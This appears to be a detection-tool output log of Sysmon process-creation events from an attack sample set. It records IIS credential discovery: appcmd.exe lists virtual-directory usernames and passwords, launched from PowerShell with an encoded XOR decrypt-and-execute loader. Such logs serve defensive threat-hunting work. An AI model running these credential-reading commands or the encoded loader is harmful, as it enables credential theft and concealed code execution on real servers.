JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAb
gBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.893 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""ERROR ( message:Configuration error "" /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.973 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""ERROR ( message:Configuration error "" /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.063 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.143 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.233 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Filename: redirection.config"" /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.323 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Filename: redirection.config"" /text:password 
: Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.403 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.473 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.563 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Line Number: 0"" /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.784 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Line Number: 0"" /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.894 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.964 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe 
: User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuA
